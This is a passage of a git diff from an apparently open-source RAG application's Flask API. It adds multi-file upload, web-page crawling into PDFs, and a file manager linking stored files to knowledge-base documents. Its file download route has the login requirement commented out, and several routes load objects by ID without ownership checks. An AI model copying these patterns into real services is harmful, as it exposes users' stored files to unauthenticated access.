return get_data_error_result(retmsg="Fail to new a dialog!")
|
||||
@ -142,7 +144,7 @@ def get_kb_names(kb_ids):
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list():
|
||||
def list_dialogs():
|
||||
try:
|
||||
diags = DialogService.query(
|
||||
tenant_id=current_user.id,
|
||||
|
||||
@ -14,7 +14,6 @@
|
||||
# limitations under the License
|
||||
#
|
||||
|
||||
import base64
|
||||
import os
|
||||
import pathlib
|
||||
import re
|
||||
@ -23,18 +22,25 @@ import flask
|
||||
from elasticsearch_dsl import Q
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
|
||||
from api.db.db_models import Task, File
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
from api.db.services.task_service import TaskService, queue_tasks
|
||||
from rag.nlp import search
|
||||
from rag.utils import ELASTICSEARCH
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid
|
||||
from api.db import FileType, TaskStatus, ParserType
|
||||
from api.db import FileType, TaskStatus, ParserType, FileSource
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.settings import RetCode
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.utils.minio_conn import MINIO
|
||||
from api.utils.file_utils import filename_type, thumbnail
|
||||
from api.utils.web_utils import html2pdf, is_valid_url
|
||||
from api.utils.web_utils import html2pdf, is_valid_url
|
||||
|
||||
|
||||
@manager.route('/upload', methods=['POST'])
|
||||
@ -48,33 +54,42 @@ def upload():
|
||||
if 'file' not in request.files:
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
file = request.files['file']
|
||||
if file.filename == '':
|
||||
|
||||
file_objs = request.files.getlist('file')
|
||||
for file_obj in file_objs:
|
||||
if file_obj.filename == '':
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
|
||||
try:
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
if DocumentService.get_doc_count(kb.tenant_id) >= int(os.environ.get('MAX_FILE_NUM_PER_USER', 8192)):
|
||||
return get_data_error_result(
|
||||
retmsg="Exceed the maximum file number of a free user!")
|
||||
raise LookupError("Can't find this knowledgebase!")
|
||||
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, current_user.id)
|
||||
kb_root_folder = FileService.get_kb_folder(current_user.id)
|
||||
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
|
||||
|
||||
err = []
|
||||
for file in file_objs:
|
||||
try:
|
||||
MAX_FILE_NUM_PER_USER = int(os.environ.get('MAX_FILE_NUM_PER_USER', 0))
|
||||
if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(kb.tenant_id) >= MAX_FILE_NUM_PER_USER:
|
||||
raise RuntimeError("Exceed the maximum file number of a free user!")
|
||||
|
||||
filename = duplicate_name(
|
||||
DocumentService.query,
|
||||
name=file.filename,
|
||||
kb_id=kb.id)
|
||||
filetype = filename_type(filename)
|
||||
if not filetype:
|
||||
return get_data_error_result(
|
||||
retmsg="This type of file has not been supported yet!")
|
||||
if filetype == FileType.OTHER.value:
|
||||
raise RuntimeError("This type of file has not been supported yet!")
|
||||
|
||||
location = filename
|
||||
while MINIO.obj_exist(kb_id, location):
|
||||
location += "_"
|
||||
blob = request.files['file'].read()
|
||||
blob = file.read()
|
||||
MINIO.put(kb_id, location, blob)
|
||||
doc = {
|
||||
"id": get_uuid(),
|
||||
@ -92,10 +107,77 @@ def upload():
|
||||
doc["parser_id"] = ParserType.PICTURE.value
|
||||
if re.search(r"\.(ppt|pptx|pages)$", filename):
|
||||
doc["parser_id"] = ParserType.PRESENTATION.value
|
||||
doc = DocumentService.insert(doc)
|
||||
return get_json_result(data=doc.to_json())
|
||||
DocumentService.insert(doc)
|
||||
|
||||
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
|
||||
except Exception as e:
|
||||
err.append(file.filename + ": " + str(e))
|
||||
if err:
|
||||
return get_json_result(
|
||||
data=False, retmsg="\n".join(err), retcode=RetCode.SERVER_ERROR)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/web_crawl', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("kb_id", "name", "url")
|
||||
def web_crawl():
|
||||
kb_id = request.form.get("kb_id")
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "KB ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
name = request.form.get("name")
|
||||
url = request.form.get("url")
|
||||
if not is_valid_url(url):
|
||||
return get_json_result(
|
||||
data=False, retmsg='The URL format is invalid', retcode=RetCode.ARGUMENT_ERROR)
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id)
|
||||
if not e:
|
||||
raise LookupError("Can't find this knowledgebase!")
|
||||
|
||||
blob = html2pdf(url)
|
||||
if not blob: return server_error_response(ValueError("Download failure."))
|
||||
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, current_user.id)
|
||||
kb_root_folder = FileService.get_kb_folder(current_user.id)
|
||||
kb_folder = FileService.new_a_file_from_kb(kb.tenant_id, kb.name, kb_root_folder["id"])
|
||||
|
||||
try:
|
||||
filename = duplicate_name(
|
||||
DocumentService.query,
|
||||
name=name+".pdf",
|
||||
kb_id=kb.id)
|
||||
filetype = filename_type(filename)
|
||||
if filetype == FileType.OTHER.value:
|
||||
raise RuntimeError("This type of file has not been supported yet!")
|
||||
|
||||
location = filename
|
||||
while MINIO.obj_exist(kb_id, location):
|
||||
location += "_"
|
||||
MINIO.put(kb_id, location, blob)
|
||||
doc = {
|
||||
"id": get_uuid(),
|
||||
"kb_id": kb.id,
|
||||
"parser_id": kb.parser_id,
|
||||
"parser_config": kb.parser_config,
|
||||
"created_by": current_user.id,
|
||||
"type": filetype,
|
||||
"name": filename,
|
||||
"location": location,
|
||||
"size": len(blob),
|
||||
"thumbnail": thumbnail(filename, blob)
|
||||
}
|
||||
if doc["type"] == FileType.VISUAL:
|
||||
doc["parser_id"] = ParserType.PICTURE.value
|
||||
if re.search(r"\.(ppt|pptx|pages)$", filename):
|
||||
doc["parser_id"] = ParserType.PRESENTATION.value
|
||||
DocumentService.insert(doc)
|
||||
FileService.add_file_from_kb(doc, kb_folder["id"], kb.tenant_id)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/create', methods=['POST'])
|
||||
@ -136,7 +218,7 @@ def create():
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list():
|
||||
def list_docs():
|
||||
kb_id = request.args.get("kb_id")
|
||||
if not kb_id:
|
||||
return get_json_result(
|
||||
@ -217,26 +299,39 @@ def change_status():
|
||||
@validate_request("doc_id")
|
||||
def rm():
|
||||
req = request.json
|
||||
doc_ids = req["doc_id"]
|
||||
if isinstance(doc_ids, str): doc_ids = [doc_ids]
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, current_user.id)
|
||||
errors = ""
|
||||
for doc_id in doc_ids:
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
tenant_id = DocumentService.get_tenant_id(doc_id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
|
||||
|
||||
DocumentService.increment_chunk_num(
|
||||
doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1, 0)
|
||||
if not DocumentService.delete(doc):
|
||||
b, n = File2DocumentService.get_minio_address(doc_id=doc_id)
|
||||
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
|
||||
MINIO.rm(doc.kb_id, doc.location)
|
||||
return get_json_result(data=True)
|
||||
f2d = File2DocumentService.get_by_document_id(doc_id)
|
||||
FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
|
||||
File2DocumentService.delete_by_document_id(doc_id)
|
||||
|
||||
MINIO.rm(b, n)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
errors += str(e)
|
||||
|
||||
if errors:
|
||||
return get_json_result(data=False, retmsg=errors, retcode=RetCode.SERVER_ERROR)
|
||||
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/run', methods=['POST'])
|
||||
@ -259,6 +354,14 @@ def run():
|
||||
ELASTICSEARCH.deleteByQuery(
|
||||
Q("match", doc_id=id), idxnm=search.index_name(tenant_id))
|
||||
|
||||
if str(req["run"]) == TaskStatus.RUNNING.value:
|
||||
TaskService.filter_delete([Task.doc_id == id])
|
||||
e, doc = DocumentService.get_by_id(id)
|
||||
doc = doc.to_dict()
|
||||
doc["tenant_id"] = tenant_id
|
||||
bucket, name = File2DocumentService.get_minio_address(doc_id=doc["id"])
|
||||
queue_tasks(doc, bucket, name)
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
@ -279,7 +382,8 @@ def rename():
|
||||
data=False,
|
||||
retmsg="The extension of file can't be changed",
|
||||
retcode=RetCode.ARGUMENT_ERROR)
|
||||
if DocumentService.query(name=req["name"], kb_id=doc.kb_id):
|
||||
for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
|
||||
if d.name == req["name"]:
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated document name in the same knowledgebase.")
|
||||
|
||||
@ -288,6 +392,11 @@ def rename():
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document rename)!")
|
||||
|
||||
informs = File2DocumentService.get_by_document_id(req["doc_id"])
|
||||
if informs:
|
||||
e, file = FileService.get_by_id(informs[0].file_id)
|
||||
FileService.update_by_id(file.id, {"name": req["name"]})
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
@ -301,7 +410,9 @@ def get(doc_id):
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
|
||||
response = flask.make_response(MINIO.get(doc.kb_id, doc.location))
|
||||
b,n = File2DocumentService.get_minio_address(doc_id=doc_id)
|
||||
response = flask.make_response(MINIO.get(b, n))
|
||||
|
||||
ext = re.search(r"\.([^.]+)$", doc.name)
|
||||
if ext:
|
||||
if doc.type == FileType.VISUAL.value:
|
||||
@ -337,7 +448,8 @@ def change_parser():
|
||||
return get_data_error_result(retmsg="Not supported yet!")
|
||||
|
||||
e = DocumentService.update_by_id(doc.id,
|
||||
{"parser_id": req["parser_id"], "progress": 0, "progress_msg": "", "run": "0"})
|
||||
{"parser_id": req["parser_id"], "progress": 0, "progress_msg": "",
|
||||
"run": TaskStatus.UNSTART.value})
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
if "parser_config" in req:
|
||||
|
||||
129
api/apps/file2document_app.py
Normal file
129
api/apps/file2document_app.py
Normal file
@ -0,0 +1,129 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License
|
||||
#
|
||||
from elasticsearch_dsl import Q
|
||||
|
||||
from api.db.db_models import File2Document
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.db.services.file_service import FileService
|
||||
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid
|
||||
from api.db import FileType
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.settings import RetCode
|
||||
from api.utils.api_utils import get_json_result
|
||||
from rag.nlp import search
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
|
||||
|
||||
@manager.route('/convert', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("file_ids", "kb_ids")
|
||||
def convert():
|
||||
req = request.json
|
||||
kb_ids = req["kb_ids"]
|
||||
file_ids = req["file_ids"]
|
||||
file2documents = []
|
||||
|
||||
try:
|
||||
for file_id in file_ids:
|
||||
e, file = FileService.get_by_id(file_id)
|
||||
file_ids_list = [file_id]
|
||||
if file.type == FileType.FOLDER.value:
|
||||
file_ids_list = FileService.get_all_innermost_file_ids(file_id, [])
|
||||
for id in file_ids_list:
|
||||
informs = File2DocumentService.get_by_file_id(id)
|
||||
# delete
|
||||
for inform in informs:
|
||||
doc_id = inform.document_id
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(doc_id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
File2DocumentService.delete_by_file_id(id)
|
||||
|
||||
# insert
|
||||
for kb_id in kb_ids:
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this knowledgebase!")
|
||||
e, file = FileService.get_by_id(id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this file!")
|
||||
|
||||
doc = DocumentService.insert({
|
||||
"id": get_uuid(),
|
||||
"kb_id": kb.id,
|
||||
"parser_id": kb.parser_id,
|
||||
"parser_config": kb.parser_config,
|
||||
"created_by": current_user.id,
|
||||
"type": file.type,
|
||||
"name": file.name,
|
||||
"location": file.location,
|
||||
"size": file.size
|
||||
})
|
||||
file2document = File2DocumentService.insert({
|
||||
"id": get_uuid(),
|
||||
"file_id": id,
|
||||
"document_id": doc.id,
|
||||
})
|
||||
file2documents.append(file2document.to_json())
|
||||
return get_json_result(data=file2documents)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("file_ids")
|
||||
def rm():
|
||||
req = request.json
|
||||
file_ids = req["file_ids"]
|
||||
if not file_ids:
|
||||
return get_json_result(
|
||||
data=False, retmsg='Lack of "Files ID"', retcode=RetCode.ARGUMENT_ERROR)
|
||||
try:
|
||||
for file_id in file_ids:
|
||||
informs = File2DocumentService.get_by_file_id(file_id)
|
||||
if not informs:
|
||||
return get_data_error_result(retmsg="Inform not found!")
|
||||
for inform in informs:
|
||||
if not inform:
|
||||
return get_data_error_result(retmsg="Inform not found!")
|
||||
File2DocumentService.delete_by_file_id(file_id)
|
||||
doc_id = inform.document_id
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(doc_id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
370
api/apps/file_app.py
Normal file
370
api/apps/file_app.py
Normal file
@ -0,0 +1,370 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License
|
||||
#
|
||||
import os
|
||||
import pathlib
|
||||
import re
|
||||
|
||||
import flask
|
||||
from elasticsearch_dsl import Q
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.utils import get_uuid
|
||||
from api.db import FileType, FileSource
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.file_service import FileService
|
||||
from api.settings import RetCode
|
||||
from api.utils.api_utils import get_json_result
|
||||
from api.utils.file_utils import filename_type
|
||||
from rag.nlp import search
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils.minio_conn import MINIO
|
||||
|
||||
|
||||
@manager.route('/upload', methods=['POST'])
|
||||
@login_required
|
||||
# @validate_request("parent_id")
|
||||
def upload():
|
||||
pf_id = request.form.get("parent_id")
|
||||
|
||||
if not pf_id:
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
|
||||
if 'file' not in request.files:
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
file_objs = request.files.getlist('file')
|
||||
|
||||
for file_obj in file_objs:
|
||||
if file_obj.filename == '':
|
||||
return get_json_result(
|
||||
data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
|
||||
file_res = []
|
||||
try:
|
||||
for file_obj in file_objs:
|
||||
e, file = FileService.get_by_id(pf_id)
|
||||
if not e:
|
||||
return get_data_error_result(
|
||||
retmsg="Can't find this folder!")
|
||||
MAX_FILE_NUM_PER_USER = int(os.environ.get('MAX_FILE_NUM_PER_USER', 0))
|
||||
if MAX_FILE_NUM_PER_USER > 0 and DocumentService.get_doc_count(current_user.id) >= MAX_FILE_NUM_PER_USER:
|
||||
return get_data_error_result(
|
||||
retmsg="Exceed the maximum file number of a free user!")
|
||||
|
||||
# split file name path
|
||||
if not file_obj.filename:
|
||||
e, file = FileService.get_by_id(pf_id)
|
||||
file_obj_names = [file.name, file_obj.filename]
|
||||
else:
|
||||
full_path = '/' + file_obj.filename
|
||||
file_obj_names = full_path.split('/')
|
||||
file_len = len(file_obj_names)
|
||||
|
||||
# get folder
|
||||
file_id_list = FileService.get_id_list_by_id(pf_id, file_obj_names, 1, [pf_id])
|
||||
len_id_list = len(file_id_list)
|
||||
|
||||
# create folder
|
||||
if file_len != len_id_list:
|
||||
e, file = FileService.get_by_id(file_id_list[len_id_list - 1])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Folder not found!")
|
||||
last_folder = FileService.create_folder(file, file_id_list[len_id_list - 1], file_obj_names,
|
||||
len_id_list)
|
||||
else:
|
||||
e, file = FileService.get_by_id(file_id_list[len_id_list - 2])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Folder not found!")
|
||||
last_folder = FileService.create_folder(file, file_id_list[len_id_list - 2], file_obj_names,
|
||||
len_id_list)
|
||||
|
||||
# file type
|
||||
filetype = filename_type(file_obj_names[file_len - 1])
|
||||
location = file_obj_names[file_len - 1]
|
||||
while MINIO.obj_exist(last_folder.id, location):
|
||||
location += "_"
|
||||
blob = file_obj.read()
|
||||
filename = duplicate_name(
|
||||
FileService.query,
|
||||
name=file_obj_names[file_len - 1],
|
||||
parent_id=last_folder.id)
|
||||
file = {
|
||||
"id": get_uuid(),
|
||||
"parent_id": last_folder.id,
|
||||
"tenant_id": current_user.id,
|
||||
"created_by": current_user.id,
|
||||
"type": filetype,
|
||||
"name": filename,
|
||||
"location": location,
|
||||
"size": len(blob),
|
||||
}
|
||||
file = FileService.insert(file)
|
||||
MINIO.put(last_folder.id, location, blob)
|
||||
file_res.append(file.to_json())
|
||||
return get_json_result(data=file_res)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/create', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("name")
|
||||
def create():
|
||||
req = request.json
|
||||
pf_id = request.json.get("parent_id")
|
||||
input_file_type = request.json.get("type")
|
||||
if not pf_id:
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
|
||||
try:
|
||||
if not FileService.is_parent_folder_exist(pf_id):
|
||||
return get_json_result(
|
||||
data=False, retmsg="Parent Folder Doesn't Exist!", retcode=RetCode.OPERATING_ERROR)
|
||||
if FileService.query(name=req["name"], parent_id=pf_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated folder name in the same folder.")
|
||||
|
||||
if input_file_type == FileType.FOLDER.value:
|
||||
file_type = FileType.FOLDER.value
|
||||
else:
|
||||
file_type = FileType.VIRTUAL.value
|
||||
|
||||
file = FileService.insert({
|
||||
"id": get_uuid(),
|
||||
"parent_id": pf_id,
|
||||
"tenant_id": current_user.id,
|
||||
"created_by": current_user.id,
|
||||
"name": req["name"],
|
||||
"location": "",
|
||||
"size": 0,
|
||||
"type": file_type
|
||||
})
|
||||
|
||||
return get_json_result(data=file.to_json())
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@login_required
|
||||
def list_files():
|
||||
pf_id = request.args.get("parent_id")
|
||||
|
||||
keywords = request.args.get("keywords", "")
|
||||
|
||||
page_number = int(request.args.get("page", 1))
|
||||
items_per_page = int(request.args.get("page_size", 15))
|
||||
orderby = request.args.get("orderby", "create_time")
|
||||
desc = request.args.get("desc", True)
|
||||
if not pf_id:
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
pf_id = root_folder["id"]
|
||||
FileService.init_knowledgebase_docs(pf_id, current_user.id)
|
||||
try:
|
||||
e, file = FileService.get_by_id(pf_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Folder not found!")
|
||||
|
||||
files, total = FileService.get_by_pf_id(
|
||||
current_user.id, pf_id, page_number, items_per_page, orderby, desc, keywords)
|
||||
|
||||
parent_folder = FileService.get_parent_folder(pf_id)
|
||||
if not FileService.get_parent_folder(pf_id):
|
||||
return get_json_result(retmsg="File not found!")
|
||||
|
||||
return get_json_result(data={"total": total, "files": files, "parent_folder": parent_folder.to_json()})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/root_folder', methods=['GET'])
|
||||
@login_required
|
||||
def get_root_folder():
|
||||
try:
|
||||
root_folder = FileService.get_root_folder(current_user.id)
|
||||
return get_json_result(data={"root_folder": root_folder})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/parent_folder', methods=['GET'])
|
||||
@login_required
|
||||
def get_parent_folder():
|
||||
file_id = request.args.get("file_id")
|
||||
try:
|
||||
e, file = FileService.get_by_id(file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Folder not found!")
|
||||
|
||||
parent_folder = FileService.get_parent_folder(file_id)
|
||||
return get_json_result(data={"parent_folder": parent_folder.to_json()})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/all_parent_folder', methods=['GET'])
|
||||
@login_required
|
||||
def get_all_parent_folders():
|
||||
file_id = request.args.get("file_id")
|
||||
try:
|
||||
e, file = FileService.get_by_id(file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Folder not found!")
|
||||
|
||||
parent_folders = FileService.get_all_parent_folders(file_id)
|
||||
parent_folders_res = []
|
||||
for parent_folder in parent_folders:
|
||||
parent_folders_res.append(parent_folder.to_json())
|
||||
return get_json_result(data={"parent_folders": parent_folders_res})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("file_ids")
|
||||
def rm():
|
||||
req = request.json
|
||||
file_ids = req["file_ids"]
|
||||
try:
|
||||
for file_id in file_ids:
|
||||
e, file = FileService.get_by_id(file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="File or Folder not found!")
|
||||
if not file.tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
if file.source_type == FileSource.KNOWLEDGEBASE:
|
||||
continue
|
||||
|
||||
if file.type == FileType.FOLDER.value:
|
||||
file_id_list = FileService.get_all_innermost_file_ids(file_id, [])
|
||||
for inner_file_id in file_id_list:
|
||||
e, file = FileService.get_by_id(inner_file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="File not found!")
|
||||
MINIO.rm(file.parent_id, file.location)
|
||||
FileService.delete_folder_by_pf_id(current_user.id, file_id)
|
||||
else:
|
||||
if not FileService.delete(file):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (File removal)!")
|
||||
|
||||
# delete file2document
|
||||
informs = File2DocumentService.get_by_file_id(file_id)
|
||||
for inform in informs:
|
||||
doc_id = inform.document_id
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
tenant_id = DocumentService.get_tenant_id(doc_id)
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
if not DocumentService.remove_document(doc, tenant_id):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document removal)!")
|
||||
File2DocumentService.delete_by_file_id(file_id)
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rename', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("file_id", "name")
|
||||
def rename():
|
||||
req = request.json
|
||||
try:
|
||||
e, file = FileService.get_by_id(req["file_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="File not found!")
|
||||
if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
|
||||
file.name.lower()).suffix:
|
||||
return get_json_result(
|
||||
data=False,
|
||||
retmsg="The extension of file can't be changed",
|
||||
retcode=RetCode.ARGUMENT_ERROR)
|
||||
for file in FileService.query(name=req["name"], pf_id=file.parent_id):
|
||||
if file.name == req["name"]:
|
||||
return get_data_error_result(
|
||||
retmsg="Duplicated file name in the same folder.")
|
||||
|
||||
if not FileService.update_by_id(
|
||||
req["file_id"], {"name": req["name"]}):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (File rename)!")
|
||||
|
||||
informs = File2DocumentService.get_by_file_id(req["file_id"])
|
||||
if informs:
|
||||
if not DocumentService.update_by_id(
|
||||
informs[0].document_id, {"name": req["name"]}):
|
||||
return get_data_error_result(
|
||||
retmsg="Database error (Document rename)!")
|
||||
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/get/<file_id>', methods=['GET'])
|
||||
# @login_required
|
||||
def get(file_id):
|
||||
try:
|
||||
e, file = FileService.get_by_id(file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
b, n = File2DocumentService.get_minio_address(file_id=file_id)
|
||||
response = flask.make_response(MINIO.get(b, n))
|
||||
ext = re.search(r"\.([^.]+)$", file.name)
|
||||
if ext:
|
||||
if file.type == FileType.VISUAL.value:
|
||||
response.headers.set('Content-Type', 'image/%s' % ext.group(1))
|
||||
else:
|
||||
response.headers.set(
|
||||
'Content-Type',
|
||||
'application/%s' %
|
||||
ext.group(1))
|
||||
return response
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/mv', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("src_file_ids", "dest_file_id")
|
||||
def move():
|
||||
req = request.json
|
||||
try:
|
||||
file_ids = req["src_file_ids"]
|
||||
parent_id = req["dest_file_id"]
|
||||
for file_id in file_ids:
|
||||
e, file = FileService.get_by_id(file_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="File or Folder not found!")
|
||||
if not file.tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
fe, _ = FileService.get_by_id(parent_id)
|
||||
if not fe:
|
||||
return get_data_error_result(retmsg="Parent Folder not found!")
|
||||
FileService.move_file(file_ids, parent_id)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
@ -19,16 +19,18 @@ from flask_login import login_required, current_user
|
||||
|
||||
from api.db.services import duplicate_name
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.db.services.file2document_service import File2DocumentService
|
